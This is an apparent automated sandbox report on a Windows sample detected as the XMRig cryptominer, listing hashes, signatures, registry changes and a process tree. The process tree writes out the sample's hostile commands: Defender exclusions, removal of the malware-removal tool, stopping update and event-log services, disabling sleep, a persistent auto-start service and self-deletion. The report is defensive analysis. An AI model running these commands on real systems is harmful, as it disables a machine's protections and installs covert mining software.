Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-11-2024 18:21
Static task
static1
Behavioral task
behavioral1
Sample
bc1ff835f337d86678369b7756be12e871f2a289.exe
Resource
win7-20240903-en
General
-
Target
bc1ff835f337d86678369b7756be12e871f2a289.exe
-
Size
5.6MB
-
MD5
752c908ea45382aa7ff4029b9ae84d96
-
SHA1
bc1ff835f337d86678369b7756be12e871f2a289
-
SHA256
2717cae9f8faaedbc37139fb3ddd08e04d9f19b41211ba0f267c62333e799063
-
SHA512
70365ff2c69b9ecb708f122fcbfd141bb360c820b46ecb5288f6ddc9887365dd492cdc8735c465575a01408cad9eb974c494f8326eda3a53cd7cdcd4055ca6bb
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/Hn:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgj
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/3744-65-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-66-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-68-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-67-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-64-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-61-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-62-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-70-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-71-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-73-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral2/memory/3744-72-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 3744 powershell.exe 4480 powershell.exe -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
fqwofdtexigy.exepid process 4396 fqwofdtexigy.exe -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 4676 powercfg.exe 1416 powercfg.exe 4292 powercfg.exe 3164 powercfg.exe 1424 powercfg.exe 1956 powercfg.exe 1376 powercfg.exe 4840 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exefqwofdtexigy.exebc1ff835f337d86678369b7756be12e871f2a289.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe File opened for modification C:\Windows\system32\MRT.exe bc1ff835f337d86678369b7756be12e871f2a289.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
fqwofdtexigy.exedescription pid process target process PID 4396 set thread context of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 set thread context of 3744 4396 fqwofdtexigy.exe nslookup.exe -
Processes:
resource yara_rule behavioral2/memory/3744-60-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-59-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-65-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-66-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-68-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-67-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-64-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-61-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-62-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-57-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-58-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-56-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-70-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-71-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-73-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral2/memory/3744-72-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2808 sc.exe 2344 sc.exe 3364 sc.exe 1456 sc.exe 3448 sc.exe 4692 sc.exe 940 sc.exe 3952 sc.exe 1528 sc.exe 2352 sc.exe 3972 sc.exe 3556 sc.exe 1824 sc.exe 1880 sc.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bc1ff835f337d86678369b7756be12e871f2a289.exepowershell.exefqwofdtexigy.exepowershell.exenslookup.exepid process 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3744 powershell.exe 3744 powershell.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 3876 bc1ff835f337d86678369b7756be12e871f2a289.exe 4396 fqwofdtexigy.exe 4480 powershell.exe 4480 powershell.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 4396 fqwofdtexigy.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe 3744 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exenslookup.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 3744 powershell.exe Token: SeShutdownPrivilege 4292 powercfg.exe Token: SeCreatePagefilePrivilege 4292 powercfg.exe Token: SeShutdownPrivilege 4676 powercfg.exe Token: SeCreatePagefilePrivilege 4676 powercfg.exe Token: SeShutdownPrivilege 3164 powercfg.exe Token: SeCreatePagefilePrivilege 3164 powercfg.exe Token: SeShutdownPrivilege 1416 powercfg.exe Token: SeCreatePagefilePrivilege 1416 powercfg.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeShutdownPrivilege 4840 powercfg.exe Token: SeCreatePagefilePrivilege 4840 powercfg.exe Token: SeLockMemoryPrivilege 3744 nslookup.exe Token: SeShutdownPrivilege 1424 powercfg.exe Token: SeCreatePagefilePrivilege 1424 powercfg.exe Token: SeShutdownPrivilege 1376 powercfg.exe Token: SeCreatePagefilePrivilege 1376 powercfg.exe Token: SeShutdownPrivilege 1956 powercfg.exe Token: SeCreatePagefilePrivilege 1956 powercfg.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.execmd.execmd.exefqwofdtexigy.exedescription pid process target process PID 3632 wrote to memory of 2688 3632 cmd.exe wusa.exe PID 3632 wrote to memory of 2688 3632 cmd.exe wusa.exe PID 5108 wrote to memory of 2408 5108 cmd.exe choice.exe PID 5108 wrote to memory of 2408 5108 cmd.exe choice.exe PID 644 wrote to memory of 1336 644 cmd.exe wusa.exe PID 644 wrote to memory of 1336 644 cmd.exe wusa.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 1608 4396 fqwofdtexigy.exe conhost.exe PID 4396 wrote to memory of 3744 4396 fqwofdtexigy.exe nslookup.exe PID 4396 wrote to memory of 3744 4396 fqwofdtexigy.exe nslookup.exe PID 4396 wrote to memory of 3744 4396 fqwofdtexigy.exe nslookup.exe PID 4396 wrote to memory of 3744 4396 fqwofdtexigy.exe nslookup.exe PID 4396 wrote to memory of 3744 4396 fqwofdtexigy.exe nslookup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc1ff835f337d86678369b7756be12e871f2a289.exe"C:\Users\Admin\AppData\Local\Temp\bc1ff835f337d86678369b7756be12e871f2a289.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3876 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2688
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3556 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1528 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1824 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2344 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3952 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3164 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4292 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1416 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4676 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:3364 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:1456 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:4692 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:3448 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bc1ff835f337d86678369b7756be12e871f2a289.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2408
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1336
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2808 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1880 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3972 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:940 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2352 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4840 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1376 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1424 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1608
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD5752c908ea45382aa7ff4029b9ae84d96
SHA1bc1ff835f337d86678369b7756be12e871f2a289
SHA2562717cae9f8faaedbc37139fb3ddd08e04d9f19b41211ba0f267c62333e799063
SHA51270365ff2c69b9ecb708f122fcbfd141bb360c820b46ecb5288f6ddc9887365dd492cdc8735c465575a01408cad9eb974c494f8326eda3a53cd7cdcd4055ca6bb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82